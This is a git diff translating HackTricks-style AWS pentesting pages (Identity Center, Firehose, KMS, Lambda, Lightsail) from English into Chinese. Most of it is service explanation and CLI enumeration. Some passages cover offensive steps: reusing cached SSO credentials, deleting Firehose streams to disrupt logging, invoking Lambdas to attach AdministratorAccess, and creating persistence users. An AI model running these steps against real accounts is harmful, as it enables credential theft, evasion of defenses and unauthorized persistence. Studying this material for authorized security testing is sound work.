账户 -Then, relationships are created so users/groups have Permission Sets over AWS Account. +然后,创建关系,使用户/组对 AWS 账户拥有权限集。 > [!NOTE] -> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). - +> 请注意,有三种方法可以将策略附加到权限集。附加 AWS 管理的策略、客户管理的策略(这些策略需要在权限集影响的所有账户中创建)和内联策略(在此定义)。 ```bash # Check if IAM Identity Center is used aws sso-admin list-instances @@ -321,11 +300,9 @@ aws identitystore list-group-memberships --identity-store-id --group- ## Get memberships or a user or a group aws identitystore list-group-memberships-for-member --identity-store-id --member-id ``` - ### Local Enumeration -It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example: - +可以在文件夹 `$HOME/.aws` 内创建文件 config,以配置可以通过 SSO 访问的配置文件,例如: ```ini [default] region = us-west-2 @@ -343,20 +320,16 @@ output = json role_arn = arn:aws:iam:::role/ReadOnlyRole source_profile = Hacktricks-Admin ``` - -This configuration can be used with the commands: - +此配置可与以下命令一起使用: ```bash # Login in ms-sso-profile aws sso login --profile my-sso-profile # Use dependent-profile aws s3 ls --profile dependent-profile ``` +当使用 **SSO 的配置文件** 访问某些信息时,凭据会 **缓存** 在文件中,位于文件夹 **`$HOME/.aws/sso/cache`** 内。因此,它们可以 **从那里读取和使用**。 -When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**. - -Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). Config example: - +此外,**更多凭据** 可以存储在文件夹 **`$HOME/.aws/cli/cache`** 中。此缓存目录主要在您 **使用 AWS CLI 配置文件** 时使用,这些配置文件使用 IAM 用户凭据或通过 IAM **假设** 角色(不使用 SSO)。配置示例: ```ini [profile crossaccountrole] role_arn = arn:aws:iam::234567890123:role/SomeRole @@ -364,43 +337,36 @@ source_profile = default mfa_serial = arn:aws:iam::123456789012:mfa/saanvi external_id = 123456 ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md {{#endref}} -### Privilege Escalation +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md {{#endref}} -### Persistence - -#### Create a user an assign permissions to it +### 持久性 +#### 创建用户并为其分配权限 ```bash # Create user identitystore:CreateUser aws identitystore create-user --identity-store-id --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password ``` +- 创建一个组并分配权限,并设置一个受控用户 +- 给受控用户或组额外的权限 +- 默认情况下,只有来自管理账户的用户才能访问和控制 IAM 身份中心。 -- Create a group and assign it permissions and set on it a controlled user -- Give extra permissions to a controlled user or group -- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. - - However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). +然而,可以通过委派管理员允许来自不同账户的用户进行管理。他们将没有完全相同的权限,但他们将能够执行 [**管理活动**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md index 6ca66b5ed..b7e559e60 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md @@ -4,12 +4,11 @@ ## Kinesis Data Firehose -Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. +Amazon Kinesis Data Firehose 是一个 **完全托管的服务**,便于 **实时流数据** 的交付。它支持多种目的地,包括 Amazon Simple Storage Service (Amazon S3)、Amazon Redshift、Amazon OpenSearch Service、Splunk 和自定义 HTTP 端点。 -The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. +该服务通过允许数据生产者配置为直接将数据转发到 Kinesis Data Firehose,减轻了编写应用程序或管理资源的需求。该服务负责 **将数据自动交付到指定目的地**。此外,Kinesis Data Firehose 提供了 **在交付之前转换数据** 的选项,增强了其灵活性和适用性,以满足各种用例。 ### Enumeration - ```bash # Get delivery streams aws firehose list-delivery-streams @@ -19,37 +18,26 @@ aws firehose describe-delivery-stream --delivery-stream-name ## Get roles aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN ``` +## 后期利用 / 防御绕过 -## Post-exploitation / Defense Bypass - -In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. +如果 firehose 被用来发送日志或防御洞察,攻击者可以利用这些功能来阻止其正常工作。 ### firehose:DeleteDeliveryStream - ``` aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete ``` - ### firehose:UpdateDestination - ``` aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id ``` - ### firehose:PutRecord | firehose:PutRecordBatch - ``` aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json ``` - -## References +## 参考 - [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md index 543ed31cd..e02a7cff7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md @@ -2,128 +2,125 @@ {{#include ../../../banners/hacktricks-training.md}} -## KMS - Key Management Service +## KMS - 密钥管理服务 -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. +AWS 密钥管理服务 (AWS KMS) 被呈现为一种托管服务,简化了用户**创建和管理客户主密钥** (CMK) 的过程。这些 CMK 在用户数据的加密中至关重要。AWS KMS 的一个显著特点是 CMK 主要由**硬件安全模块** (HSM) 保护,增强了加密密钥的保护。 -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. +KMS 使用**对称加密**。这用于**加密静态信息**(例如,在 S3 中)。如果您需要**加密传输中的信息**,则需要使用类似**TLS**的东西。 -KMS is a **region specific service**. +KMS 是一种**区域特定服务**。 -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. +**亚马逊的管理员无法访问您的密钥**。他们无法恢复您的密钥,也不会帮助您加密您的密钥。AWS 仅管理操作系统和底层应用程序,管理我们的加密密钥及其使用方式由我们自己负责。 -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. +**客户主密钥** (CMK):可以加密最大 4KB 的数据。它们通常用于创建、加密和解密 DEK(数据加密密钥)。然后使用 DEK 来加密数据。 -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. +客户主密钥 (CMK) 是 AWS KMS 中主密钥的逻辑表示。除了主密钥的标识符和其他元数据(包括创建日期、描述和密钥状态)外,**CMK 包含用于加密和解密数据的密钥材料**。当您创建 CMK 时,默认情况下,AWS KMS 为该 CMK 生成密钥材料。然而,您可以选择创建没有密钥材料的 CMK,然后将自己的密钥材料导入该 CMK。 -There are 2 types of master keys: +有两种类型的主密钥: -- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. -- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. +- **AWS 管理的 CMK:由其他服务用于加密数据**。它由在区域中创建它的服务使用。它们在您首次在该服务中实现加密时创建。每 3 年轮换一次,无法更改。 +- **客户管理的 CMK**:灵活性、轮换、可配置的访问和密钥策略。启用和禁用密钥。 -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. +**信封加密**在密钥管理服务 (KMS) 的上下文中:两级层次系统,用于**用数据密钥加密数据,然后用主密钥加密数据密钥**。 -### Key Policies +### 密钥策略 -These defines **who can use and access a key in KMS**. +这些定义了**谁可以使用和访问 KMS 中的密钥**。 -By **default:** +**默认情况下:** -- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. +- 它授予**拥有 KMS 密钥的 AWS 账户的 IAM 访问**,以通过 IAM 管理对 KMS 密钥的访问。 - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. +与其他 AWS 资源策略不同,AWS **KMS 密钥策略不会自动授予账户的任何主体权限**。要授予账户管理员权限,**密钥策略必须包含提供此权限的明确声明**,如下所示。 - - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. +- 如果不允许账户(`"AWS": "arn:aws:iam::111122223333:root"`),IAM 权限将无效。 -- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. +- 它**允许账户使用 IAM 策略**来允许访问 KMS 密钥,除了密钥策略之外。 - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. +**没有此权限,允许访问密钥的 IAM 策略将无效**,尽管拒绝访问密钥的 IAM 策略仍然有效。 -- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: +- 它**通过向账户管理员(包括无法删除的账户根用户)授予访问控制权限,降低密钥变得不可管理的风险**。 +**默认策略**示例: ```json { - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" +"Sid": "Enable IAM policies", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::111122223333:root" +}, +"Action": "kms:*", +"Resource": "*" } ``` - > [!WARNING] -> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. +> 如果**账户被允许**(`"arn:aws:iam::111122223333:root"`),则该账户的**主体**仍然需要**IAM权限**才能使用KMS密钥。然而,如果某个角色的**ARN**在**密钥策略**中**被特别允许**,则该角色**不需要IAM权限**。
-Policy Details +策略详情 -Properties of a policy: +策略的属性: -- JSON based document -- Resource --> Affected resources (can be "\*") -- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -- Effect --> Allow/Deny -- Principal --> arn affected -- Conditions (optional) --> Condition to give the permissions +- 基于JSON的文档 +- 资源 --> 受影响的资源(可以是"\*") +- 操作 --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ...(权限) +- 效果 --> 允许/拒绝 +- 主体 --> 受影响的arn +- 条件(可选) --> 授予权限的条件 -Grants: +授权: -- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -- After the grant is created a GrantToken and a GratID are issued +- 允许将您的权限委托给您AWS账户内的另一个AWS主体。您需要使用AWS KMS API创建它们。可以指明CMK标识符、受赠主体和所需的操作级别(解密、加密、生成数据密钥...) +- 授权创建后,会发出GrantToken和GrantID -**Access**: +**访问**: -- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -- Via **IAM policy** -- Via **grants** +- 通过**密钥策略** -- 如果存在此策略,则优先于IAM策略 +- 通过**IAM策略** +- 通过**授权**
-### Key Administrators +### 密钥管理员 -Key administrator by default: +默认的密钥管理员: -- Have access to manage KMS but not to encrypt or decrypt data -- Only IAM users and roles can be added to Key Administrators list (not groups) -- If external CMK is used, Key Administrators have the permission to import key material +- 有权管理KMS,但无权加密或解密数据 +- 只能将IAM用户和角色添加到密钥管理员列表中(不能是组) +- 如果使用外部CMK,密钥管理员有权限导入密钥材料 -### Rotation of CMKs +### CMK的轮换 -- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -- **Older keys are retained** to decrypt data that was encrypted prior to the rotation -- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. +- 同一密钥放置的时间越长,使用该密钥加密的数据就越多,如果该密钥被泄露,则数据的风险范围就越大。此外,密钥活动的时间越长,被泄露的概率就越高。 +- **KMS每365天轮换客户密钥**(或者您可以在任何时候手动执行此过程),**AWS管理的密钥每3年轮换一次**,且此时间无法更改。 +- **旧密钥被保留**以解密在轮换之前加密的数据 +- 在泄露的情况下,轮换密钥不会消除威胁,因为仍然可以解密所有使用被泄露密钥加密的数据。然而,**新数据将使用新密钥加密**。 +- 如果**CMK**处于**禁用**或**待删除**状态,KMS将**不执行密钥轮换**,直到CMK被重新启用或删除被取消。 -#### Manual rotation +#### 手动轮换 -- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -- You need to **keep old keys to decrypt old files** encrypted with it. +- 需要**创建一个新CMK**,然后创建一个新的CMK-ID,因此您需要**更新**任何**应用程序**以**引用**新的CMK-ID。 +- 为了简化此过程,您可以**使用别名引用密钥ID**,然后只需更新别名所指向的密钥。 +- 您需要**保留旧密钥以解密使用其加密的旧文件**。 -You can import keys from your on-premises key infrastructure . +您可以从您的本地密钥基础设施导入密钥。 -### Other relevant KMS information +### 其他相关KMS信息 -KMS is priced per number of encryption/decryption requests received from all services per month. +KMS按每月从所有服务接收的加密/解密请求数量定价。 -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. +KMS与CloudTrail有完整的审计和合规**集成**;在这里,您可以审计对KMS所做的所有更改。 -With KMS policy you can do the following: +使用KMS策略,您可以执行以下操作: -- Limit who can create data keys and which services have access to use these keys -- Limit systems access to encrypt only, decrypt only or both -- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). +- 限制谁可以创建数据密钥以及哪些服务可以使用这些密钥 +- 限制系统访问仅加密、仅解密或两者都可以 +- 定义使系统能够跨区域访问密钥(尽管不推荐,因为托管KMS的区域发生故障将影响其他区域系统的可用性)。 -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -### Enumeration +您不能在区域之间同步或移动/复制密钥;您只能定义规则以允许跨区域访问。 +### 枚举 ```bash aws kms list-keys aws kms list-key-policies --key-id @@ -132,31 +129,26 @@ aws kms describe-key --key-id aws kms get-key-policy --key-id --policy-name # Default policy name is "default" aws kms describe-custom-key-stores ``` - -### Privesc +### 提权 {{#ref}} ../aws-privilege-escalation/aws-kms-privesc.md {{#endref}} -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-kms-persistence.md {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index 03fa1aac8..0d423adf9 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md @@ -4,59 +4,58 @@ ## Lambda -Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations. +亚马逊网络服务(AWS)Lambda 被描述为一种 **计算服务**,使得在不需要服务器配置或管理的情况下执行代码成为可能。它的特点是能够 **自动处理代码执行所需的资源分配**,确保高可用性、可扩展性和安全性等特性。Lambda 的一个重要方面是其定价模型,**费用仅基于所使用的计算时间**,消除了初始投资或长期义务的需要。 -To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table. +要调用一个 lambda,可以 **随意调用**(使用 Cloudwatch),**暴露**一个 **URL** 端点并调用它,通过 **API Gateway** 调用,甚至基于 **事件**,例如 **S3** 存储桶中的数据 **更改** 或 **DynamoDB** 表的更新。 -The **code** of a lambda is stored in **`/var/task`**. +一个 lambda 的 **代码** 存储在 **`/var/task`** 中。 ### Lambda Aliases Weights -A Lambda can have **several versions**.\ -And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\ -If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit. +一个 Lambda 可以有 **多个版本**。\ +它可以通过 **别名** 暴露 **多个** 版本。每个别名中暴露的 **版本** 的 **权重** 将决定 **哪个别名接收调用**(例如可以是 90%-10%)。\ +如果 **一个** 别名的代码是 **脆弱的**,你可以发送 **请求,直到脆弱** 的版本接收到攻击。 ![](<../../../images/image (223).png>) ### Resource Policies -Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\ -For example this is the policy to allow **anyone to access a lambda exposed via URL**: +Lambda 资源策略允许 **授予其他服务/账户调用** lambda 的权限。\ +例如,这是允许 **任何人通过 URL 访问一个 lambda** 的策略:
-Or this to allow an API Gateway to invoke it: +或者这是允许 API Gateway 调用它的策略:
### Lambda Database Proxies -When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\ -Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation. +当有 **数百个** **并发的 lambda 请求** 时,如果每个请求都需要 **连接并关闭与数据库的连接**,这根本行不通(lambdas 是无状态的,无法保持连接打开)。\ +因此,如果你的 **Lambda 函数与 RDS Proxy 交互** 而不是与数据库实例交互。它处理并发 Lambda 函数创建的许多同时连接所需的连接池。这使得你的 Lambda 应用程序能够 **重用现有连接**,而不是为每个函数调用创建新连接。 ### Lambda EFS Filesystems -To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it. +为了保存甚至共享数据,**Lambdas 可以访问 EFS 并挂载它们**,这样 Lambda 就能够从中读取和写入。 ### Lambda Layers -A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. +一个 Lambda _layer_ 是一个 .zip 文件归档,**可以包含额外的代码**或其他内容。一个 layer 可以包含库、[自定义运行时](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html)、数据或配置文件。 -It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. +每个函数最多可以包含 **五个层**。当你在一个函数中包含一个 layer 时,**内容会被提取到执行环境中的 `/opt`** 目录。 -By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. +默认情况下,你创建的 **layers** 是 **私有** 的,属于你的 AWS 账户。你可以选择 **与其他账户共享** 一个 layer 或 **将** 该 layer **公开**。如果你的函数使用了一个不同账户发布的 layer,你的函数可以 **在该 layer 被删除后,或在你被撤销访问该 layer 的权限后继续使用该 layer 版本**。但是,你不能使用已删除的 layer 版本创建新函数或更新函数。 -Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. +作为容器镜像部署的函数不使用 layers。相反,你在构建镜像时将所需的运行时、库和其他依赖项打包到容器镜像中。 ### Lambda Extensions -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. +Lambda 扩展通过与各种 **监控、可观察性、安全性和治理工具** 集成来增强函数。这些扩展通过 [.zip 归档使用 Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署中](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/),以两种模式运行:**内部** 和 **外部**。 -- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** 和 **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 和 11、Node.js 10 和 12,以及 .NET Core 3.1**。 +- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作一致。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。 ### Enumeration - ```bash aws lambda get-account-settings @@ -93,11 +92,9 @@ aws lambda list-event-source-mappings aws lambda list-code-signing-configs aws lambda list-functions-by-code-signing-config --code-signing-config-arn ``` +### 调用一个 lambda -### Invoke a lambda - -#### Manual - +#### 手动 ```bash # Invoke function aws lambda invoke --function-name FUNCTION_NAME /tmp/out @@ -106,83 +103,70 @@ aws lambda invoke --function-name FUNCTION_NAME /tmp/out ## user_name = event['user_name'] aws lambda invoke --function-name --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt ``` - -#### Via exposed URL - +#### 通过暴露的 URL ```bash aws lambda list-function-url-configs --function-name #Get lambda URL aws lambda get-function-url-config --function-name #Get lambda URL ``` +#### 通过 URL 调用 Lambda 函数 -#### Call Lambda function via URL - -Now it's time to find out possible lambda functions to execute: - +现在是时候找出可以执行的可能的 lambda 函数了: ``` aws --region us-west-2 --profile level6 lambda list-functions ``` - ![](<../../../images/image (262).png>) -A lambda function called "Level6" is available. Lets find out how to call it: - +一个名为“Level6”的lambda函数可用。让我们找出如何调用它: ```bash aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 ``` - ![](<../../../images/image (102).png>) -Now, that you know the name and the ID you can get the Name: - +现在,您知道名称和ID后,可以获取名称: ```bash aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" ``` - ![](<../../../images/image (237).png>) -And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) +最后调用函数访问(注意ID、名称和函数名称出现在URL中): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) `URL:`**`https://.execute-api..amazonaws.com//`** -#### Other Triggers +#### 其他触发器 -There are a lot of other sources that can trigger a lambda +还有很多其他来源可以触发lambda
-### Privesc +### 权限提升 -In the following page you can check how to **abuse Lambda permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用Lambda权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-lambda-privesc.md {{#endref}} -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-lambda-post-exploitation/ {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-lambda-persistence/ {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md index 9f5ccb1ab..3af464cee 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md @@ -4,11 +4,10 @@ ## AWS - Lightsail -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. +Amazon Lightsail 提供了一种**简单**、轻量级的方式,让新的云用户能够利用 AWS 的云计算服务。它允许您通过 **VMs** (**EC2**) 和 **containers** 在几秒钟内部署常见和自定义的网络服务。\ +它是一个**最小的 EC2 + Route53 + ECS**。 ### Enumeration - ```bash # Instances aws lightsail get-instances #Get all @@ -29,35 +28,30 @@ aws lightsail get-load-balancers aws lightsail get-static-ips aws lightsail get-key-pairs ``` +### 分析快照 -### Analyse Snapshots +可以从 **lightsail** 生成 **实例和关系数据库快照**。因此,您可以像检查 [**EC2 快照**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) 和 [**RDS 快照**](aws-relational-database-rds-enum.md#enumeration) 一样检查这些快照。 -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). +### 元数据 -### Metadata +**元数据端点可以从 lightsail 访问**,但机器运行在 **AWS 账户中,由 AWS 管理**,因此您无法控制 **授予了哪些权限**。然而,如果您找到利用这些的方式,您将直接利用 AWS。 -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. - -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-lightsail-privesc.md {{#endref}} -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-lightsail-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-lightsail-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md index 8504db545..05359a487 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md @@ -4,28 +4,27 @@ ## Amazon MQ -### Introduction to Message Brokers +### 消息代理简介 -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. +**消息代理**作为中介,促进不同软件系统之间的通信,这些系统可能建立在不同的平台上,并用不同的语言编程。**Amazon 